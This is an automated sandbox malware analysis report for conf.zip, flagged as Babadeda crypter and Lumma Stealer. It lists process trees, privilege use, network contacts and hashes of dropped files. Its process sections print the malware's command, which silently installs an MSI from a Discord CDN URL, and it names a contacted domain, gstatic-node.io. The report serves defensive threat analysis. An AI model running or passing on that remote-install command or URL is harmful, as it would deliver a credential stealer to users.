Malware Analysis Report

2024-09-22 16:41

Sample ID 230827-2em6gsdf23
Target conf.zip
SHA256 884ef747b4d2d5475674db0544a8bd4f3dde6f4f5ae4c7523331ebcbd31d6f27
Tags
babadeda lumma crypter loader stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

884ef747b4d2d5475674db0544a8bd4f3dde6f4f5ae4c7523331ebcbd31d6f27

Threat Level: Known bad

The file conf.zip was found to be: Known bad.

Malicious Activity Summary

babadeda lumma crypter loader stealer

Babadeda Crypter

Babadeda

Lumma Stealer

Blocklisted process makes network request

Executes dropped EXE

Use of msiexec (install) with remote resource

Loads dropped DLL

Enumerates connected drives

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious behavior: GetForegroundWindowSpam

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2023-08-27 22:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-27 22:29

Reported

2023-08-27 22:32

Platform

win7-20230712-en

Max time kernel

120s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Use of msiexec (install) with remote resource

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1864 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\msiexec.exe
PID 1864 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\msiexec.exe
PID 1864 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\msiexec.exe
PID 1864 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\msiexec.exe
PID 1864 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\msiexec.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i https://cdn.discordapp.com/attachments/1139130854761844741/1139155521396559954/aspose.msi /quiet

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-27 22:29

Reported

2023-08-27 22:32

Platform

win10v2004-20230703-en

Max time kernel

142s

Max time network

147s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk

Signatures

Babadeda

loader crypter babadeda

Babadeda Crypter

Description Indicator Process Target
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe N/A

Use of msiexec (install) with remote resource

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9DB8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA155.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI95C8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9FFB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA0D7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA2CD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA2DD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA494.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i https://cdn.discordapp.com/attachments/1139130854761844741/1139155521396559954/aspose.msi /quiet

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 104D06A2D1432D9B994AF864E681C1C4

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe

"C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4628 -ip 4628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4628 -ip 4628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1448

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic-node.io udp
US 188.114.97.0:80 gstatic-node.io tcp
US 188.114.97.0:80 gstatic-node.io tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.109.69.13.in-addr.arpa udp

Files

C:\Windows\Installer\MSI95C8.tmp

MD5 c3798ee9903ba07a6608ad0778d422d3
SHA1 b12ee580df86de2cabf8a921bc9652ad1e874f20
SHA256 5096934b3f97efee0dfc0f5d2b10ee1c78be523238a6f2685b58d36b8ff80cdd
SHA512 5c0afd03d9de60d1643f8db33609b478e95f0e3a7bdeffca2ad858175716ec7565fdcf90b125235a5c894049fd992485ffcf1b425db96719c6b9ad825359fb60

C:\Windows\Installer\MSI9DB8.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSI9DB8.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSI9FFB.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSI9FFB.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA0D7.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA0D7.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA0D7.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA155.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA155.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA2CD.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA2CD.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA2DD.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Windows\Installer\MSIA2DD.tmp

MD5 a9941233b9415b479d3b4f3732161eab
SHA1 cb2d99af52b3b1c712943b13e45d85c80c732e57
SHA256 ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2
SHA512 cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe

MD5 700f45b97576c03feb6e7f82f34f92a5
SHA1 c6d4639261874019aab3d1edecebf827652b4dd4
SHA256 8d8ed55802b825f7ec8b19008f00fa2514ede5010350975295cbdc4700ffaace
SHA512 c54d342d968b9c28748b6226fbf35f4a417baa57568a11ce37dfc5996f6f18492b9ce9c558e24b82a4d17257fd6fae7d00b2d270703cbb9961ffe10ae27cfe8f

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe

MD5 700f45b97576c03feb6e7f82f34f92a5
SHA1 c6d4639261874019aab3d1edecebf827652b4dd4
SHA256 8d8ed55802b825f7ec8b19008f00fa2514ede5010350975295cbdc4700ffaace
SHA512 c54d342d968b9c28748b6226fbf35f4a417baa57568a11ce37dfc5996f6f18492b9ce9c558e24b82a4d17257fd6fae7d00b2d270703cbb9961ffe10ae27cfe8f

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.dll

MD5 868a85db64eb92a821e6928a9e161270
SHA1 b853cff977b4e5c80463e7c94287332b28e47537
SHA256 67be9154c7c4f83d1009b434a8dadb7b64083db602e0dd4fb6f4c0b64eabcd64
SHA512 9013976f07ca492fabb69ae276d80d07198f52eccc34a1f7f50e3c6167721f95b2730bdd151133bc626ff1b3de5391a9c9994163153edc8af247b041d77cb95c

C:\Config.Msi\e57a385.rbs

MD5 c22da31a479b9e219a7b33be6fa2eff7
SHA1 4cb7151f2105b05df7138dc7c4ed3cefc5e45ef9
SHA256 f26b97f8673e96a08d99754f5267c147487976d32ca35089c106e2af4da19714
SHA512 c481d8388da228daeb7c790608f82ffb58f4f2d98016c1d35f695cc3026902295d5fc2a097cde4c7acf89714da8a8fb352fa9153e672d398c2e3c266f3f6bd26

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\gif-v2.dll

MD5 dd3d067c139254d741a8b4f3a8af216e
SHA1 dddbb19996620ddfd9e9625f4c502356efed2c25
SHA256 e19006a51b60dcc3e212948ff5531bb7a4c69f832f256de13b84aa646baf8c57
SHA512 04ef2d19a5c5c49817ee9214d7eeae513795a440209923009caa6283cc467762837fc2da5ac20c517a7326fde2fffca444b011e5bee089ecf6bb1177b705734c

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\gif-v2.dll

MD5 dd3d067c139254d741a8b4f3a8af216e
SHA1 dddbb19996620ddfd9e9625f4c502356efed2c25
SHA256 e19006a51b60dcc3e212948ff5531bb7a4c69f832f256de13b84aa646baf8c57
SHA512 04ef2d19a5c5c49817ee9214d7eeae513795a440209923009caa6283cc467762837fc2da5ac20c517a7326fde2fffca444b011e5bee089ecf6bb1177b705734c

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.dll

MD5 868a85db64eb92a821e6928a9e161270
SHA1 b853cff977b4e5c80463e7c94287332b28e47537
SHA256 67be9154c7c4f83d1009b434a8dadb7b64083db602e0dd4fb6f4c0b64eabcd64
SHA512 9013976f07ca492fabb69ae276d80d07198f52eccc34a1f7f50e3c6167721f95b2730bdd151133bc626ff1b3de5391a9c9994163153edc8af247b041d77cb95c

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\aspose.dll

MD5 0f849bc43ffe1bb5f29aac19f11f6740
SHA1 2bb74d7772c4b7cae2571e5751914e267b482002
SHA256 65eb8d11d173cc5c330a2a87f602e2140c1a73b7cda6eb8c46b88ed2ff093860
SHA512 08f168fd42ec9bd83cb6a1f8b580ef50a8aa97db5abd70c1323c090931e29963b1eca350ca9fdebdc5d56b824bc8c11f9b2a1a44f466ea44f5bdb05bf8526675

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\et\frame.wav

MD5 88d23c6d9df3fd0481f0fc5f6f371ad1
SHA1 4fb6f9aca5c18687d95202d17ece1fbec90f4bad
SHA256 16da76874a974a58ccd9f8473cce66155237c032567d829d79bb08246b9a71a1
SHA512 9eb29d5d64b82be54228149f652fbe4696bb619628f1188a2284c1a5fa3bde41e1b0405162675a275aab9c8d4d0d78c3784204cc11fca3049a3a416723a264b0

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\aspose.dll

MD5 0f849bc43ffe1bb5f29aac19f11f6740
SHA1 2bb74d7772c4b7cae2571e5751914e267b482002
SHA256 65eb8d11d173cc5c330a2a87f602e2140c1a73b7cda6eb8c46b88ed2ff093860
SHA512 08f168fd42ec9bd83cb6a1f8b580ef50a8aa97db5abd70c1323c090931e29963b1eca350ca9fdebdc5d56b824bc8c11f9b2a1a44f466ea44f5bdb05bf8526675

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\Unrar.dll

MD5 8acc93a5e7f034341465e19ca8153ec9
SHA1 f4192443c09167756dfe7c887626feeac1407265
SHA256 4df7928a91a8fbfd2068f858347eccbf2423d2c61be8ef61e3ae4c3034fb7bb7
SHA512 e6229abe8c360a58ad5342b1eeb815d57c7645525233bd6a79384dda254e7d3849dd6a345acbdd759bccfbffa41a3de31fafdb682b989e90ad1003035f2f3637

C:\Users\Admin\AppData\Local\Aspose.Words for .NET\Unrar.dll

MD5 8acc93a5e7f034341465e19ca8153ec9
SHA1 f4192443c09167756dfe7c887626feeac1407265
SHA256 4df7928a91a8fbfd2068f858347eccbf2423d2c61be8ef61e3ae4c3034fb7bb7
SHA512 e6229abe8c360a58ad5342b1eeb815d57c7645525233bd6a79384dda254e7d3849dd6a345acbdd759bccfbffa41a3de31fafdb682b989e90ad1003035f2f3637

memory/4628-71-0x0000000074F30000-0x0000000074F92000-memory.dmp

memory/4628-72-0x0000000002AB0000-0x0000000002AD0000-memory.dmp

memory/4628-73-0x0000000002AE0000-0x0000000002B43000-memory.dmp

memory/4628-78-0x0000000074F30000-0x0000000074F92000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-08-27 22:29

Reported

2023-08-27 22:32

Platform

win7-20230712-en

Max time kernel

117s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\dependentlibs.list

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\.list\ = "list_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
